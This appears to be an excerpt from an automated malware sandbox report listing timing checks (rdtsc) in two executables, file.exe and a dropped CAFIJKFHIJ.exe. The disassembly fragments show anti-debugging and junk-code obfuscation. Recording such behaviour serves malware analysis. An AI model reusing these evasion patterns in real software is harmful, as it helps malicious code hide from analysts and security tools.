Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0BD9 second address: 4CD0BDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0BDD second address: 4CD0BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 32F427 second address: 32F42B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 32F42B second address: 32F431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 32F431 second address: 32F436 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4A9FFA second address: 4A9FFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4A9FFE second address: 4AA00A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F8C99233266h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4AA327 second address: 4AA352 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8C98BA52B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F8C98BA52C7h 0x00000011 pushad 0x00000012 popad 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4AA352 second address: 4AA35A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4AA49F second address: 4AA4A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4AC8DF second address: 4AC8F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnc 00007F8C99233266h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4AC8F3 second address: 4AC8F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4AC8F8 second address: 4AC916 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8C9923326Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jnc 00007F8C99233274h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4AC916 second address: 4AC927 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8C98BA52B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4AC927 second address: 4AC92C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4AC92C second address: 4AC932 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4AC932 second address: 4AC936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4AC97C second address: 4AC981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4AC981 second address: 4AC9E9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 ja 00007F8C99233266h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007F8C99233268h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 mov dx, F892h 0x0000002d push 00000000h 0x0000002f jmp 00007F8C99233272h 0x00000034 call 00007F8C99233269h 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F8C99233276h 0x00000040 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4AC9E9 second address: 4ACA00 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007F8C98BA52C4h 0x0000000f push eax 0x00000010 push edx 0x00000011 jnl 00007F8C98BA52B6h 0x00000017 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4ACA00 second address: 4ACA18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F8C9923326Ch 0x00000012 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4ACB2C second address: 4ACB5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C98BA52C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a sbb edx, 337C9016h 0x00000010 lea ebx, dword ptr [ebp+1245183Ch] 0x00000016 push edi 0x00000017 mov dword ptr [ebp+122D1F16h], edi 0x0000001d pop edi 0x0000001e xchg eax, ebx 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4ACB5F second address: 4ACB63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4ACBBE second address: 4ACBE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 push edi 0x00000009 jmp 00007F8C98BA52C8h 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4ACBE4 second address: 4ACC1A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov ecx, dword ptr [ebp+122D2B66h] 0x0000000e pushad 0x0000000f mov dword ptr [ebp+122D1F16h], ecx 0x00000015 popad 0x00000016 push 00000000h 0x00000018 xor dword ptr [ebp+122D1CF0h], edi 0x0000001e push B07ED638h 0x00000023 pushad 0x00000024 jmp 00007F8C9923326Ah 0x00000029 push eax 0x0000002a push edx 0x0000002b jno 00007F8C99233266h 0x00000031 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4ACC1A second address: 4ACC1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4ACC1E second address: 4ACC81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 4F812A48h 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F8C99233268h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 mov ecx, dword ptr [ebp+122D2E4Ah] 0x0000002e mov dword ptr [ebp+122D1D73h], ebx 0x00000034 push 00000003h 0x00000036 mov dword ptr [ebp+122D1DBEh], ebx 0x0000003c push 00000000h 0x0000003e add edi, 7E39E5EDh 0x00000044 push 00000003h 0x00000046 add ecx, dword ptr [ebp+122D1F16h] 0x0000004c push AD776B3Eh 0x00000051 jng 00007F8C99233274h 0x00000057 push eax 0x00000058 push edx 0x00000059 jg 00007F8C99233266h 0x0000005f rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4BF61E second address: 4BF624 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4CAE5A second address: 4CAE66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4CAE66 second address: 4CAE6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4CAE6C second address: 4CAE77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4CAFF4 second address: 4CAFF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4CB582 second address: 4CB5B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F8C99233266h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c jmp 00007F8C99233271h 0x00000011 pushad 0x00000012 popad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 popad 0x00000016 jbe 00007F8C9923326Ch 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4CB5B3 second address: 4CB5C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jne 00007F8C98BA52B6h 0x00000014 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4CB5C7 second address: 4CB5CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4CB5CB second address: 4CB5D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4CB5D1 second address: 4CB5E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F8C99233270h 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4CBCB8 second address: 4CBCBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4CBCBC second address: 4CBCCC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F8C9923326Ah 0x0000000c rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4CBCCC second address: 4CBCDE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8C98BA52BCh 0x00000008 jl 00007F8C98BA52B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4CBE1B second address: 4CBE47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F8C99233279h 0x0000000d jmp 00007F8C9923326Ch 0x00000012 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4CBE47 second address: 4CBE4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4CBE4E second address: 4CBE5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F8C99233266h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4CF22B second address: 4CF231 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4D0A26 second address: 4D0A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jc 00007F8C99233266h 0x0000000c rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4D29DA second address: 4D29E4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8C98BA52C2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4D8A52 second address: 4D8A6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C9923326Eh 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4D8A6B second address: 4D8A71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4D817A second address: 4D817E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4D817E second address: 4D818D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C98BA52BBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4D818D second address: 4D8193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4D8193 second address: 4D81A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F8C98BA52B6h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4D81A5 second address: 4D81AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4D8761 second address: 4D8765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4D8905 second address: 4D890B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4D890B second address: 4D8910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4DB017 second address: 4DB01B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4DB01B second address: 4DB076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8C98BA52C1h 0x0000000b popad 0x0000000c xor dword ptr [esp], 06D77B53h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F8C98BA52B8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d xor esi, 31EDB021h 0x00000033 call 00007F8C98BA52B9h 0x00000038 pushad 0x00000039 jg 00007F8C98BA52B8h 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4DB076 second address: 4DB088 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F8C99233268h 0x00000010 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4DB088 second address: 4DB08D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4DB5D5 second address: 4DB5D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4DBD47 second address: 4DBD4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4DCF7B second address: 4DCF80 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4DE021 second address: 4DE06D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8C98BA52C0h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F8C98BA52C6h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 mov esi, dword ptr [ebp+122D2B9Ah] 0x00000019 mov edi, 47FCDF1Fh 0x0000001e push 00000000h 0x00000020 mov edi, dword ptr [ebp+122D2B5Eh] 0x00000026 mov dword ptr [ebp+12460F53h], esi 0x0000002c push eax 0x0000002d pushad 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4DEBCE second address: 4DEBD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4DEBD4 second address: 4DEBD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4E52A4 second address: 4E52A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4E52A8 second address: 4E52DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C98BA52BAh 0x00000007 jmp 00007F8C98BA52BFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F8C98BA52C4h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4E52DC second address: 4E5302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C99233279h 0x00000009 popad 0x0000000a jl 00007F8C99233272h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4E5302 second address: 4E5308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4E5308 second address: 4E5315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jnl 00007F8C99233266h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 49AF13 second address: 49AF18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 49AF18 second address: 49AF31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F8C9923326Fh 0x0000000b popad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4E5923 second address: 4E5951 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8C98BA52B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jnp 00007F8C98BA52B6h 0x00000013 jmp 00007F8C98BA52C2h 0x00000018 popad 0x00000019 je 00007F8C98BA52BCh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4DFDE1 second address: 4DFDE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4E9A74 second address: 4E9A78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4DFDE5 second address: 4DFDF3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8C99233266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4E9A78 second address: 4E9A7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4E9A7C second address: 4E9A92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007F8C9923326Ch 0x00000010 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4ECC95 second address: 4ECD0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F8C98BA52B6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F8C98BA52B8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 push 00000000h 0x0000002b mov edi, dword ptr [ebp+122DBCA5h] 0x00000031 mov edi, esi 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edx 0x00000038 call 00007F8C98BA52B8h 0x0000003d pop edx 0x0000003e mov dword ptr [esp+04h], edx 0x00000042 add dword ptr [esp+04h], 00000016h 0x0000004a inc edx 0x0000004b push edx 0x0000004c ret 0x0000004d pop edx 0x0000004e ret 0x0000004f pushad 0x00000050 mov al, 8Fh 0x00000052 mov dx, CF84h 0x00000056 popad 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b push edi 0x0000005c pop edi 0x0000005d jmp 00007F8C98BA52BFh 0x00000062 popad 0x00000063 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4EEBF9 second address: 4EEC31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C99233278h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8C99233279h 0x00000011 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4F0C81 second address: 4F0C9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C98BA52C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4F0C9A second address: 4F0C9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4F2DA9 second address: 4F2DC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C98BA52C4h 0x00000007 jns 00007F8C98BA52B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
